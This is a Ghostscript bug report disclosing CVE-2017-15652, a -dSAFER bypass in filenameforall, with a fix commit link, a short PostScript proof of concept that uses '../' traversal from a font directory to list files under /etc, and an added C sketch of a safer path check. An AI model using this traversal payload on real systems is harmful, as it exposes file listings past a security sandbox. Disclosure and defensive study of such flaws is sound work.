Summary: | Bypass -dSAFER in filenameforall command | ||
---|---|---|---|
Product: | Ghostscript | Reporter: | Jasper Yu <007seadog> |
Component: | Security (public) | Assignee: | Chris Liddell (chrisl) <chris.liddell> |
Status: | RESOLVED FIXED | ||
Severity: | normal | ||
Priority: | P4 | ||
Version: | unspecified | ||
Hardware: | PC | ||
OS: | Linux | ||
Customer: | | Word Size: | --- |
Attachments: | the script run with ghostscript 9.22 | ||

I just requested a CVE number from MITRE, and the following was assigned. Please use this CVE as reference in patching or info dissemination related to this particular issue.

CVE-2017-15652

Thanks

Fixed in: http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=2fc463d0e

Thanks for the report!

Created attachment 14403: the script run with ghostscript 9.22

CVE-2013-5653 fixed the issue where filenameforall can ignore -dSAFER and list the files. But still, there are some ways to bypass it.

```
%!PS
(/usr/share/fonts/../../../../../../../../etc/*) {print (\n) print} 1024 string filenameforall
quit
```

Is it possible to request a CVE ID?
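
The pattern in the report starts inside a font directory and climbs out of it with `../`. As an added illustration (not Ghostscript's code and not the change in the referenced commit), the C sketch below assumes a permission check that compares the pattern against permitted directory prefixes, and contrasts a raw prefix match with one that normalizes the pattern first; `permitted`, `normalize`, `naive_allowed` and `safe_allowed` are hypothetical names and the allow-list is constructed.

```c
#include <stdio.h>
#include <string.h>
/* Constructed allow-list (assumption); not Ghostscript's real permitted paths. */
static const char *permitted[] = { "/usr/share/fonts", "/usr/share/ghostscript" };
#define NPERM (sizeof permitted / sizeof *permitted)

/* Lexically collapse "//", "." and ".." in an absolute path; -1 on bad input. */
static int normalize(const char *in, char *out, size_t cap) {
    size_t len = 0;
    if (in[0] != '/' || cap < 2) return -1;
    while (*in) {
        while (*in == '/') in++;                     /* skip separators */
        size_t n = strcspn(in, "/");                 /* next component length */
        if (n == 2 && in[0] == '.' && in[1] == '.') {
            while (len > 0 && out[--len] != '/') {}  /* drop last component */
        } else if (n > 0 && !(n == 1 && in[0] == '.')) {
            if (len + n + 2 > cap) return -1;
            out[len++] = '/';
            memcpy(out + len, in, n);
            len += n;
        }
        in += n;
    }
    if (len == 0) out[len++] = '/';                  /* everything collapsed to root */
    out[len] = '\0';
    return 0;
}

/* Weak check: raw prefix match, so "<permitted>/../.." still passes. */
int naive_allowed(const char *pattern) {
    for (size_t i = 0; i < NPERM; i++)
        if (strncmp(pattern, permitted[i], strlen(permitted[i])) == 0) return 1;
    return 0;
}

/* Hardened check: normalize first, match whole components, fail closed. */
int safe_allowed(const char *pattern) {
    char norm[4096];
    if (normalize(pattern, norm, sizeof norm) != 0) return 0;
    for (size_t i = 0; i < NPERM; i++) {
        size_t n = strlen(permitted[i]);
        if (!strncmp(norm, permitted[i], n) && (norm[n] == '/' || !norm[n])) return 1;
    }
    return 0;
}

int main(void) {
    const char *p = "/usr/share/fonts/../../../../../../../../etc/*"; /* from the report */
    printf("naive=%d safe=%d\n", naive_allowed(p), safe_allowed(p));
}
```

Lexical normalization does not resolve symbolic links, so a check that must also cover links inside a permitted directory has to compare resolved paths (for example via `realpath`) as well.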